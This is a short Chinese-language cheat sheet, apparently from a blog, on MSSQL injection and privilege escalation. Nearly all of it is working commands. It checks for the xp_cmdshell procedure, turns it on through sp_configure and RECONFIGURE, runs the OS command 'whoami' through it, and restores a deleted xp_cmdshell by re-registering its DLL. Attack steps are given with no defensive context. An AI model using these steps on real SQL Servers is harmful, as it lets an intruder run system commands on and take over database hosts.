MSSQL的基本知识,SQL注入方法和漏洞利用执行和提权的方法,推荐:MSSQL 注入与提权方法整理
返回1,判断存在
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
开启xp_cmdshell模块
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
执行命令
exec master..xp_cmdshell 'whoami'
恢复被删除的组件
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'